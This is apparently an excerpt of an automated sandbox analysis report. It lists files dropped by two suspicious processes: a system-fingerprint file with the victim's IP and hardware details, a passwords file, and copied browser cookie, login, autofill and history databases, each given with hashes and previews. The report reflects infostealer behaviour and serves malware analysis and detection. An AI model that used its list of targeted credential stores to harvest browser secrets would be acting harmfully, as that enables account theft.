                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\adobevqkoBMIvF7c3\information.txt

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7486
                                                                                                                                                                                                                                      Entropy (8bit):5.370134377851073
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:xfkOZRSuc2KBhA6tsxODsG6v0K1U5PFmXkWSY7AANUbg3x:xJ8uX6tsxPDt1oNm0WT7hB
                                                                                                                                                                                                                                      MD5:A7D04DE6D3AD53122F7CFDBA7FCD6463
                                                                                                                                                                                                                                      SHA1:BDD746CF0B959133346C1FFE0C9465AEDDBA79C8
                                                                                                                                                                                                                                      SHA-256:5C580CEF77B3AD652C882ED4C03D2399D404DA706F7189AD9C83E338D68F83CF
                                                                                                                                                                                                                                      SHA-512:571AA034D221240E5B9B8437375CF7D394C3A72B47782ACFC83870AE1940001B6AAB16145E6D430A57BAA73867F871B92ECAAA41314F381971B26DD5C2803658
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:Build: bladak..Version: 1.9....Date: Fri Apr 19 03:29:39 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: cfeb70a35b65616976a5684cd81effed....Path: C:\ProgramData\MPGPH131\MPGPH131.exe..Work Dir: C:\Users\user\AppData\Local\Temp\adobevqkoBMIvF7c3....IP: 81.181.57.52..Location: US, Atlanta..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 899552 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 19/4/2024 3:29:39..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [332]..csrss.exe [420]..wininit.exe [496]..csrss.exe [504]..winlogon.exe [564]..services.exe [632]..lsass.exe [640]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.exe [78

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\adobevqkoBMIvF7c3\passwords.txt

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4897
                                                                                                                                                                                                                                      Entropy (8bit):2.518316437186352
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                                                                                                                                                                                      MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                                                                                                                                                                                      SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                                                                                                                                                                                      SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                                                                                                                                                                                      SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\02zdBXl47cvzcookies.sqlite

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\07LucNa8jukyWeb Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\3b6N2Xdh3CYwplaces.sqlite

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                                                                                                      Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\7XR6xMZjKO19Web Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\CITywoXtg3A3Web Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\D87fZN3R3jFeplaces.sqlite

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                                                                                                      Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\EQdiqCjz0H8hWeb Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\IGPZ0gzg5563Web Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\INEwiBvdy7w4Login Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\SJkliA5V7z5tLogin Data For Account

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\dqqa2Z_HIAV7History

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\g8Bu6cD4CROQHistory

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\l97nQpdHtrGwLogin Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\m_zU7z10wd87Cookies

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                      Entropy (8bit):0.8439810553697228
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\ncGGapBPttpQHistory

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\xdpRti9nj1yoCookies

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
